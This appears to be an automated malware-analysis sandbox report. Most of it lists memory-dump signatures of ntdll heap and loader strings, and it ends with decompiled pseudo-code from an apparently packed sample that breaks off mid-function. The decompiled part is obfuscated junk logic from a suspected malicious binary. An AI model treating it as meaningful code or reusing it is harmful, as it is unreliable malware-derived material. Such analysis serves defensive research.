            • Opcode Fuzzy Hash: 0eb0923fde85fcd716fa0e467bd7addbe43a76c40a891abfced1ee4124c87454
            • Instruction Fuzzy Hash: 94B2356250D7D28EEB139B38CC58B91BFE15F07318F9E86DAC0D08E4A3D7A9554AC316
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
            • API String ID: 0-3178619729
            • Opcode ID: 81ee99bb8c6d505fcbd3197638d23032348b70edd0133c1fc4807a62a36fb2b9
            • Instruction ID: f0d9632fc53063ebe6987526e17f75840a571796ccdd201583578f0ca52fdff9
            • Opcode Fuzzy Hash: 81ee99bb8c6d505fcbd3197638d23032348b70edd0133c1fc4807a62a36fb2b9
            • Instruction Fuzzy Hash: 3522FD70A002459FDB24CF29C895B7ABBF5FF84705F248569E8468B382E734DC89CB50
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
            • API String ID: 0-4253913091
            • Opcode ID: 0d0bf56855b86ea241ca6f6d608685525d94c4b961e3031904711de3ccb21e28
            • Instruction ID: 1811d8583f2612ef0d7d75c1a9be8743f1c576055da28aa1aa5927929bf48c2d
            • Opcode Fuzzy Hash: 0d0bf56855b86ea241ca6f6d608685525d94c4b961e3031904711de3ccb21e28
            • Instruction Fuzzy Hash: 40E19C70A10209EFDB19CF68D994BBAB7B5FF49300F2481A9E4169B391D735ED41CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
            • API String ID: 0-1145731471
            • Opcode ID: 40adccda39b977b583d80829c6a8a562a4cc4b887ffebeedff24e7f016251cd0
            • Instruction ID: a450ad654648b3d57921410e9ed11d05be29b4f85c32b50c8af7e9a6ce994f18
            • Opcode Fuzzy Hash: 40adccda39b977b583d80829c6a8a562a4cc4b887ffebeedff24e7f016251cd0
            • Instruction Fuzzy Hash: 66B1AD71A0072A9BCF25DB64C980BADB779BF84324F144129FA11EB285D770EC60DB90
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 00A49C18
            • LdrpDoPostSnapWork, xrefs: 00A49C1E
            • minkernel\ntdll\ldrsnap.c, xrefs: 00A49C28
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
            • API String ID: 0-1948996284
            • Opcode ID: 2cba9ca5a2abd2b6d337ec407aeffa83d35cc37ee9dc93b42a8661d0f63f799e
            • Instruction ID: f651f1c71c48f47d299f5af2cc2e8a584e3c252f8b743a6bf2f51f2a3ae81556
            • Opcode Fuzzy Hash: 2cba9ca5a2abd2b6d337ec407aeffa83d35cc37ee9dc93b42a8661d0f63f799e
            • Instruction Fuzzy Hash: 6C911331A0021EAFDF98DF58C881ABB77B9FF84350B644069EA11AB251DF70ED41CB90
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: FilterFullPath$UseFilter$\??\
            • API String ID: 0-2779062949
            • Opcode ID: 8b1696190f27a26aa1795c98b7829e5de30ab45542811dfd86e4330183d1b3c3
            • Instruction ID: 2757cef253a478b5817fa3c34e4baed9f104134c42ae3a55563ded972b1666cf
            • Opcode Fuzzy Hash: 8b1696190f27a26aa1795c98b7829e5de30ab45542811dfd86e4330183d1b3c3
            • Instruction Fuzzy Hash: 5DA16C369116699BDF31DF68CD89BAAB7B8EF84700F1001EAE90CA7250D7359E84CF50
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
            • API String ID: 0-1334570610
            • Opcode ID: 10d6b918654c67aece4de2a71cf26553efdaa31f6b226345697dd94c698e36de
            • Instruction ID: 404ecc04f3a0252d28a96fc7b3aa6789df16fec952cdb7271748060492ee7a29
            • Opcode Fuzzy Hash: 10d6b918654c67aece4de2a71cf26553efdaa31f6b226345697dd94c698e36de
            • Instruction Fuzzy Hash: B261D170610249DFDB18CF28D685B6ABBF5FF45304F24C56EE8498B292D730E885CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • HEAP[%wZ]: , xrefs: 00A9254F
            • HEAP: , xrefs: 00A9255C
            • Heap block at %p modified at %p past requested size of %Ix, xrefs: 00A9256F
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
            • API String ID: 0-3815128232
            • Opcode ID: 3c81eeae426ad60586ad98e3c2546f6f47160da4007ea64c8a4cd27ed22eee20
            • Instruction ID: dd88d635ee76a525ef8c0efbbca4f52fca48a97c30468d6ae1be405954b47676
            • Opcode Fuzzy Hash: 3c81eeae426ad60586ad98e3c2546f6f47160da4007ea64c8a4cd27ed22eee20
            • Instruction Fuzzy Hash: 90512634340260AAEB74CF2EC8547B277F1EBC8744F65485AE8C28B281D639DC47EB61
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • InstallLanguageFallback, xrefs: 009EE6DB
            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 009EE68C
            • @, xrefs: 009EE6C0
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
            • API String ID: 0-1757540487
            • Opcode ID: 528758a8f2ec7e098cbad8c1c13e2fcf1726d315cce3c09a2c8328ade28a2afd
            • Instruction ID: ee4c00a2ca3a31585e5f2229c57b504819436abb728d803b010b63872645412b
            • Opcode Fuzzy Hash: 528758a8f2ec7e098cbad8c1c13e2fcf1726d315cce3c09a2c8328ade28a2afd
            • Instruction Fuzzy Hash: 4F51DCBA9187559BC715DF24C450AABB3E8BF88714F04092EF985DB241FB34DE44C7A2
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • HEAP[%wZ]: , xrefs: 00A542A2
            • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 00A542BA
            • HEAP: , xrefs: 00A542AF
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
            • API String ID: 0-1596344177
            • Opcode ID: 8e27a43c106d38a663c2377aabced3d43540e433fa9308a9aedfd8a3adefec63
            • Instruction ID: 27dccd4b5e063f82925f45b44ae9d7268e54c807e157e541b540fdb6abdec31d
            • Opcode Fuzzy Hash: 8e27a43c106d38a663c2377aabced3d43540e433fa9308a9aedfd8a3adefec63
            • Instruction Fuzzy Hash: F3510131A00529DFDB18DF58D584B6AB7F1FF89314F2584A9E8059B382C731EC42EB91
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
            • API String ID: 0-2558761708
            • Opcode ID: c5f21f9a7d737a23ce19d26578e973e446c6ed0827e20d9824211cb08519112a
            • Instruction ID: d983bfffa7cd85a2159f96332cef2ab315e8b8bcb611368edc87f92ae1e01c54
            • Opcode Fuzzy Hash: c5f21f9a7d737a23ce19d26578e973e446c6ed0827e20d9824211cb08519112a
            • Instruction Fuzzy Hash: 0611E13132510A9BD718DB29E691B3AB3A5EB80761F24802EE50ACB2E1D730DC44D761
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • @_EH4_CallFilterFunc@8.LIBCMT ref: 00A735C1
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID: CallFilterFunc@8
            • String ID: @
            • API String ID: 4062629308-2766056989
            • Opcode ID: 9ae94ee687ff9f5bcbba30174e922a69f2a63dfd7452aec940410a5ae9b91c72
            • Instruction ID: 7238978a4934d52655a6fe053e0218942e2a135ba541bebed16ee2ef60815da1
            • Opcode Fuzzy Hash: 9ae94ee687ff9f5bcbba30174e922a69f2a63dfd7452aec940410a5ae9b91c72
            • Instruction Fuzzy Hash: F6417B72D01218EECB20DFA9DE41A6EBBB8EF05B00F15852AF909DB361D630CA40DB51
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • 'LDR: %s(), invalid image format of MUI file , xrefs: 00A4A93C
            • LdrpLoadResourceFromAlternativeModule, xrefs: 00A4A937
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: 'LDR: %s(), invalid image format of MUI file $LdrpLoadResourceFromAlternativeModule
            • API String ID: 0-411237641
            • Opcode ID: e2d130efeb23c163753208b61abd05a4b9f724ba6f3ff45211b00e4dff9a83c5
            • Instruction ID: 13aa5a5c1d20930532a54a27485f13c6b5b2afa512ee6114558124b778e8739e
            • Opcode Fuzzy Hash: e2d130efeb23c163753208b61abd05a4b9f724ba6f3ff45211b00e4dff9a83c5
            • Instruction Fuzzy Hash: CDD1BA35208389CBD725CF24C480B7AB7E9BBC8794F14892EFA899B291D774DD45CB42
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • ResIdCount less than 2., xrefs: 00A568CA
            • Failed to retrieve service checksum., xrefs: 00A5686E
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
            • API String ID: 0-863616075
            • Opcode ID: caff8d6854adf463476fe9c7b3012673b6b822c7accfa54d200df3575258487b
            • Instruction ID: 2637370adea44a85633ef7bf80e14bdd09c9d5ab4b7114a50a1e4d1fcde91c28
            • Opcode Fuzzy Hash: caff8d6854adf463476fe9c7b3012673b6b822c7accfa54d200df3575258487b
            • Instruction Fuzzy Hash: 0ED102B09087809FD724CF2AD581B9BFBE5BBC8704F50892EE99997350DB709949CF42
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: `$`
            • API String ID: 0-197956300
            • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
            • Instruction ID: e69b7ce9ce110f81ab94167ebf5468b3374d077e5973b7f113b6367f749a5bbb
            • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
            • Instruction Fuzzy Hash: 86918D316043429FE724CF29C941B2BB7E6AF89714F14892DF999CB2C1E775E904CB62
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID: InitializeThunk
            • String ID: Legacy$UEFI
            • API String ID: 2994545307-634100481
            • Opcode ID: 6e2c58d08f7748ae5cb6acd581933b033a1fe0685f249467d4195991c8cb0291
            • Instruction ID: f4e3dad7267c0bd2e5c69ae5e6f64bf3d3347047f3cdb43c19426ea4478adc11
            • Opcode Fuzzy Hash: 6e2c58d08f7748ae5cb6acd581933b033a1fe0685f249467d4195991c8cb0291
            • Instruction Fuzzy Hash: 24513AB1E00A199FDB24DFB8D991AAEBBB8FF48B40F14402DE559EB251D671D900CB50
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • LdrpResGetMappingSize Enter, xrefs: 00A184FA
            • LdrpResGetMappingSize Exit, xrefs: 00A1850C
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
            • API String ID: 0-1497657909
            • Opcode ID: f3aacfc923397165cc6921035a4f480c22f9dd420692e388358073b72e08a883
            • Instruction ID: cb417e6260e4af09cb656e246cc050b53750403c8f8feaf8a947692f2afd0696
            • Opcode Fuzzy Hash: f3aacfc923397165cc6921035a4f480c22f9dd420692e388358073b72e08a883
            • Instruction Fuzzy Hash: C051BD71A00649DFDB21CFA8D980BEEB7B6FF54754F144029E811AB291EB78DD80CB24
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: 0$Flst
            • API String ID: 0-758220159
            • Opcode ID: 8f5ea8ba934b87cb8ef97b62489cd6d274fa20cd2cfb39e648db3ae20b52282c
            • Instruction ID: 2d7fe39df74cf8bc14efd3920f09f44dbc85ffb2c2ef0546f9036f6c29106232
            • Opcode Fuzzy Hash: 8f5ea8ba934b87cb8ef97b62489cd6d274fa20cd2cfb39e648db3ae20b52282c
            • Instruction Fuzzy Hash: 06417CB1A00288CBDB25CF99D5807ADFBF9EF94314F24802AD14A9F290E7309D41CB80
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • RtlpResUltimateFallbackInfo Exit, xrefs: 009F61DD
            • RtlpResUltimateFallbackInfo Enter, xrefs: 009F61CE
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
            • API String ID: 0-2876891731
            • Opcode ID: 93f7e2e2aac23ef3be170898fca66f54e1d3b7bb3cebf351fd856675e9f01e88
            • Instruction ID: 0575a5d48eba3ddea41a9be1f6b2b05c8f3be62ce9792a6ae88059fbce6a76ad
            • Opcode Fuzzy Hash: 93f7e2e2aac23ef3be170898fca66f54e1d3b7bb3cebf351fd856675e9f01e88
            • Instruction Fuzzy Hash: E541CC35A04309DBDB24CFA9D840BBE77B4FF81304F2444A9EA24DB291EB399D00DB51
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 00A5B0B7
            • RtlpInitializeAssemblyStorageMap, xrefs: 00A5B0B2
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
            • API String ID: 0-2653619699
            • Opcode ID: 0dbb8b7857bf4a53e43cd733916986ac35d35e7b2a0d863764b32a276c7410c0
            • Instruction ID: 60a3ccae9bfda183a15c9c148681236806bbb68a251cec0ebfb17af893398ba0
            • Opcode Fuzzy Hash: 0dbb8b7857bf4a53e43cd733916986ac35d35e7b2a0d863764b32a276c7410c0
            • Instruction Fuzzy Hash: B8112972B00204FBE7248F5C9D41FABB6A9EB84B15F24C02ABE04DB284E671DD40D3A4
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: MUI
            • API String ID: 0-1339004836
            • Opcode ID: 8b2f1c36fb42b5f08f0edf052bc6523d7654fbbb4149a6c040c26660f0046371
            • Instruction ID: 6cd698e51102e4e8fcb5fb244d2e6b1403d4b85ae38b12a7e0545f863429adf5
            • Opcode Fuzzy Hash: 8b2f1c36fb42b5f08f0edf052bc6523d7654fbbb4149a6c040c26660f0046371
            • Instruction Fuzzy Hash: AA7269B5E0021D8BDB24CFA8CA807BDB7B5BF88314F24C56AE959AB241D7349D85CF50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 63%
            			E0041D18D(void* __eax, signed int __ebx, void* __edx, signed int __edi, signed int __esi) {
            				void* _t86;
            				intOrPtr _t90;
            				signed int _t92;
            				signed int _t100;
            				signed char _t110;
            				signed char _t112;
            				signed int _t117;
            				signed int _t119;
            				intOrPtr _t120;
            				signed int _t127;
            
            				asm("sbb ecx, [0xa5bd8126]");
            				_t92 =  *0x80e8f561;
            				 *0x80e8f561 = __ebx;
            				asm("sbb [0xfd8f2e1b], edx");
            				_t110 = __edx +  *0x6f2eb8be;
            				asm("lodsb");
            				 *0x7e8be927 =  *0x7e8be927 >> 0x5a;
            				asm("sbb cl, 0x84");
            				_t117 = __edi |  *0x887d5ba9;
            				 *0xb1353c63 =  *0xb1353c63 ^ _t110;
            				_t100 =  *0xfec6f760 * 0x321f;
            				 *0x39311209 = _t92;
            				asm("sbb [0x3635d9c6], cl");
            				_t119 =  *0xc10b0abf;
            				 *0xc10b0abf = __esi;
            				asm("rcr dword [0x33ee310d], 0xae");
            				if((_t92 & 0x000000a2) == 0) {
            					L1:
            					_t120 = _t119 - 1;
            					_t112 = _t110 - 0x1f3b6309 & 0x0000000a;
            					asm("rol dword [0x61ebde0d], 0xff");
            					_t127 = _t100;
            					 *0xc0a94b6 = _t112;
            					 *0x50ed5fdc =  *0x50ed5fdc - _t112;
            					 *0xc1b3a1bf =  *0xc1b3a1bf & _t127;
            					 *0x350f2005 =  *0x350f2005 - _t127;
            					 *0x6e0daae6 =  *0x6e0daae6 << 0x13;
            					 *0xdf445f24 = (_t92 &  *0x5a741308) +  *0xca37bd61;
            					 *0xac6b76d = 0x529aaef4;
            					asm("stosd");
            					 *0x9e9065e1 =  *0x9e9065e1 >> 0x40;
            					asm("cmpsw");
            					_t86 = _t127;
            					 *0x7328f499 =  *0x7328f499 | _t117;
            					asm("rol byte [0xd3105bc6], 0x97");
            					 *0xb41b3126 =  *0xb41b3126 << 4;
            					_t110 =  *0x61b7ea81;
            					asm("sbb edx, [0x81430a29]");
            					_pop( *0xcc050afc);
            					 *0xaa00ad28 = _t110;
            					 *0x4fc2240a =  *0x4fc2240a - _t86;
            					_t100 = (((_t100 ^ 0x00000032) - 0x0000008a & 0x00000030) +  *0x86f48f2b &  *0x93d59938 ^  *0x3e8f5109) - 1;
            					_t117 = _t117 - 1;
            					_t92 =  *0xb7080a6b * 0x1e88;
            					 *0x498e842e = _t120;
            					_t119 = _t120 - 1;
            				} else {
            					__edx = 0xeb0c0b74;
            					__ecx = __ecx | 0x142da9db;
            					__eflags = __ecx;
            					__esi = 0x33ee300e;
            					if(__eflags == 0) {
            						goto L1;
            					} else {
            						 *0x370c0e74 =  *0x370c0e74 >> 0x5b;
            						_push(__esp);
            						asm("adc [0x2cf04711], esp");
            						asm("sbb [0x9fb52327], eax");
            						__ebp =  *0xeec1e8f;
            						if(__eflags > 0) {
            							goto L1;
            						} else {
            							 *0x22e32f77 =  *0x22e32f77 << 0xc8;
            							__eflags =  *0x22e32f77;
            							 *0xe7eb002e =  *0xe7eb002e >> 0xe6;
            							if( *0x22e32f77 < 0) {
            								goto L1;
            							} else {
            								0x33ee300e ^  *0xa90f3878 = (0x33ee300e ^  *0xa90f3878) + 1;
            								asm("sbb [0x725312ec], ebp");
            								asm("adc ecx, [0x1d756aa9]");
            								_pop(__edx);
            								asm("rcl dword [0xb50c3a8f], 0xc9");
            								_push(__esp);
            								__esp = __esp - 1;
            								_push(0x33ee300e);
            								asm("stosb");
            								__bh = __bh ^  *0x12636018;
            								asm("stosd");
            								__dl = __dl &  *0xb9324112;
            								__ecx = __ecx + 1;
            								__esi = (0x33ee300e ^  *0xa90f3878) + 1 - 1;
            								__eflags = __ch & 0x000000e7;
            								__ebp = __ebp &  *0xa28391ce;
            								asm("rcr byte [0xf8ce3b1], 0x39");
            								_push( *0x2a0d6361);
            								__eflags =  *0x15b5564 & __ebp;
            								asm("rcr dword [0x7ce4ed9f], 0x9c");
            								__ebx = __ebx -  *0xac3b136;
            								__bh = __bh |  *0x4b1bba10;
            								__edi = __edi + 1;
            								asm("adc bl, 0x82");
            								__eflags =  *0x20b120da & __ecx;
            								 *0x2f715bee = 0x33ee300e;
            								__esp = __esp - 1;
            								__edi =  *0x4e122966;
            								asm("adc esi, [0xfedf67cd]");
            								asm("stosb");
            								 *0x61d411e1 =  *0x61d411e1 & __ch;
            								__eflags =  *0x61d411e1;
            								if( *0x61d411e1 < 0) {
            									goto L1;
            								} else {
            									__edx = 0xeb0c0b74 ^  *0x11db5f72;
            									asm("adc ecx, [0x63691193]");
            									__ebx = __ebx - 1;
            									asm("rcr dword [0xef34b78f], 0x38");
            									__eflags =  *0x9d4cefd9 & __ebx;
            									 *0x1ae2549e =  *0x1ae2549e ^ __ebx;
            									__dl = __dl &  *0x27d41600;
            									asm("adc [0xded2ae86], ah");
            									__ebx = __ebx + 1;
            									__eflags = __ebx;
            									asm("sbb ecx, [0x5575b406]");
            									asm("adc [0x9fcdc9f1], eax");
            									if(__ebx >= 0) {
            										goto L1;
            									} else {
            										asm("sbb esi, 0x94312f79");
            										asm("rcr dword [0x5e053c61], 0xbf");
            										__edx = __edx ^  *0x86406c5;
            										__eflags = 0xeb0c0b74;
            										if(0xeb0c0b74 < 0) {
            											goto L1;
            										} else {
            											__edx =  *0x37a5347c * 0xb119;
            											_push(__eax);
            											__edx =  *0x37a5347c * 0xb119 - 1;
            											__eflags = __edx;
            											_push(__ebp);
            											_push(__edx);
            											__eax = 0x73c0083e;
            											if(__edx < 0) {
            												goto L1;
            											} else {
            												 *0xc990372 =  *0xc990372 >> 0x35;
            												__eax = 0x73c0083e +  *0x5da34183;
            												__bl = __bl + 0xd0;
            												__esp =  *0x3e82d369 * 0x72ce;
            												asm("stosb");
            												 *0x8f456d =  *0x8f456d >> 0xea;
            												asm("sbb [0x9f1da82c], cl");
            												__ebp = 0x991b4915;
            												__dl = __dl +  *0xc683bf30;
            												__dh = __dh ^ 0x000000e0;
            												asm("adc esi, [0x5609ebb9]");
            												asm("sbb eax, [0x1c9530b8]");
            												asm("sbb [0x2d159ee5], dh");
            												__ecx = __ecx + 0x2999a1a1;
            												__ecx = __ecx + 1;
            												 *0x50e5fe3e =  *0x50e5fe3e + __edi;
            												__ah =  *0xeeb6f710;
            												__eflags = 0x991b4915 -  *0x9a172164;
            												__bh = __bh -  *0x3e79d92a;
            												__bh = __bh -  *0x33902be3;
            												asm("adc ecx, [0xffb86b35]");
            												__esi = __esi + 0x322bda1e;
            												__bh = __bh ^  *0xcd8c39f2;
            												asm("rcr dword [0x8df301c7], 0x2d");
            												 *0xb2234ae2 =  *0xb2234ae2 - __al;
            												__cl = __cl | 0x00000034;
            												__ch = __ch ^  *0xbe68e100;
            												__eflags = __ch;
            												if(__ch != 0) {
            													goto L1;
            												} else {
            													 *0x7998ee7a =  *0x7998ee7a + __esp;
            													 *0x767df800 =  *0x767df800 >> 0xef;
            													_pop(__ebp);
            													asm("sbb [0x94207c1e], edx");
            													__esp = __esp - 1;
            													__esp = __esp ^ 0xcec6b592;
            													__ebp = 0x991b4915 -  *0x8d265623;
            													__edx = __edx + 1;
            													_pop(__edx);
            													__ebp = 0x991b4915 -  *0x8d265623 +  *0x8e4fe3f8;
            													__esp =  *0x90538dee;
            													__eax = __eax + 0x431e059c;
            													asm("ror byte [0x5aafbb4], 0x82");
            													__esp =  *0x3cb5d16;
            													asm("stosb");
            													__ebx = __ebx ^  *0xcb613205;
            													 *0x7e05aa04 =  *0x7e05aa04 >> 0xcd;
            													 *0xaaf801d2 =  *0xaaf801d2 + __ah;
            													asm("adc edi, [0x5d1b205]");
            													asm("sbb edx, [0x3e05aafa]");
            													__esp =  *0xaa0ad960 * 0x8103;
            													 *0x170450b1 =  *0x170450b1 | __bh;
            													_pop( *0x4c2c227);
            													__ebp = 0x991b4915 -  *0x8d265623 +  *0x8e4fe3f8 ^  *0xc2bd4a8b;
            													 *0xb7389904 =  *0xb7389904 + __bl;
            													__ecx = __ecx & 0x316604c2;
            													__eflags =  *0x7505c2b5 & __cl;
            													asm("sbb ebp, 0xaa0ece15");
            													asm("rol dword [0xcd295105], 0x5e");
            													asm("rol byte [0xf405aa04], 0x13");
            													_t26 = __ecx;
            													__ecx =  *0xaa06d46f;
            													 *0xaa06d46f = _t26;
            													asm("adc [0xb4134d07], esp");
            													asm("sbb [0xe2160566], ebx");
            													 *0xb60c5707 =  *0xb60c5707 | __edi;
            													_pop(__ebp);
            													 *0x7e214f8 =  *0x7e214f8 | __edi;
            													asm("rcl dword [0x83197168], 0xbb");
            													__eax = __eax |  *0x7e21a06;
            													__eax = __eax |  *0x28c92829;
            													asm("rcl byte [0x8e22263], 0x2b");
            													__edi = __edi - 0x7ced4d31;
            													 *0xca2f3022 =  *0xca2f3022 >> 0x78;
            													__al = __al +  *0x421db308;
            													asm("adc esp, [0x19a55b29]");
            													__al = __al &  *0xe93108ca;
            													_push( *0xaa0ad960 * 0x8103);
            													_push( *0x243265dc);
            													__bl = __bl &  *0xd52b08ca;
            													 *0xb15f1b22 = __dh;
            													__eflags =  *0x7a09ca1d & __esp;
            													__esp = __esp ^  *0xd0b36dfd;
            													asm("rcl byte [0xad2490a], 0x11");
            													__ebp = (0x991b4915 -  *0x8d265623 +  *0x8e4fe3f8 ^  *0xc2bd4a8b) -  *0xe6c76109;
            													 *0xae26ad7 =  *0xae26ad7 >> 0x48;
            													__edi = __edi -  *0xe9090aba;
            													__esi = __esi +  *0x998afc11;
            													 *0xacd2ffe =  *0xacd2ffe + __edx;
            													_t29 = __ch;
            													__ch =  *0xb3fd410a;
            													 *0xb3fd410a = _t29;
            													__bh = __bh -  *0xc3d6993c;
            													asm("lodsb");
            													(0x991b4915 -  *0x8d265623 +  *0x8e4fe3f8 ^  *0xc2bd4a8b) -  *0xe6c76109 + 1 =  *0xec00b6b * 0x2329;
            													_push( *0xab057868);
            													__al = __al &  *0x874f63c;
            													__edx = __edx ^ 0x470d6bed;
            													asm("sbb edi, [0xca253465]");
            													asm("rcl dword [0x349f5711], 0x9");
            													__eflags =  *0xafaa10bf & __ecx;
            													__bl = __bl +  *0x7a7aba24;
            													asm("rol byte [0xd627fc22], 0x39");
            													__edx = __edx - 1;
            													asm("adc [0xe7bf14ff], esp");
            													 *0x3bf3defb =  *0x3bf3defb - 0x33ee300e;
            													__eflags =  *0x3bf3defb;
            													if( *0x3bf3defb < 0) {
            														goto L1;
            													} else {
            														__esp =  *0xfd7f777c * 0x159c;
            														asm("lodsd");
            														__esi = 0x12e80e9e;
            														asm("sbb esi, [0xe77f2efa]");
            														 *0x13ef9725 =  *0x13ef9725 << 0x61;
            														 *0x47cd91ef =  *0x47cd91ef << 0x1b;
            														 *0x51045930 =  *0x51045930 << 0x64;
            														_push(__edx);
            														__dh = __dh + 0x63;
            														__eflags = __ebx - 0x259b30b;
            														__bl = 0x3c;
            														__eflags = __esp - 0x8cd29483;
            														__ebp =  *0x6740360 * 0xbf0e;
            														__eflags = __esp -  *0x35f4d495;
            														__ch = __ch +  *0xba587e0c;
            														__eax = __eax + 1;
            														__dl = __dl -  *0x30a3ea88;
            														asm("sbb [0xc100c867], eax");
            														__eflags = __ecx & 0xc1b38a07;
            														if((__ecx & 0xc1b38a07) < 0) {
            															goto L1;
            														} else {
            															__ecx = __ecx -  *0xe2d9be78;
            															asm("adc eax, [0xafc4c116]");
            															_t34 = __bh;
            															__bh =  *0x595d08f9;
            															 *0x595d08f9 = _t34;
            															__ecx = __ecx ^  *0xc34aa8db;
            															__edi = 0xaeca3ed9;
            															 *0xeaba7427 =  *0xeaba7427 ^ 0x73c0083e;
            															__eflags =  *0xeaba7427;
            															_pop(__ecx);
            															_push( *0xb711c70f);
            															 *0xe34a461d = __ebp;
            															if( *0xeaba7427 != 0) {
            																goto L1;
            															} else {
            																__edx = __edx -  *0xca1b475;
            																__esp = __esp + 0xf8fcead6;
            																__eflags = 0xaeca3ed9 -  *0xff071b16;
            																__ch = __ch - 0x1c;
            																 *0xbb43201d =  *0xbb43201d >> 0x26;
            																__dh = __dh + 0xe5;
            																__edi =  *0x77d5996f;
            																 *0x77d5996f = 0xaeca3ed9;
            																__edi =  *0xc6ffe660 * 0xedf1;
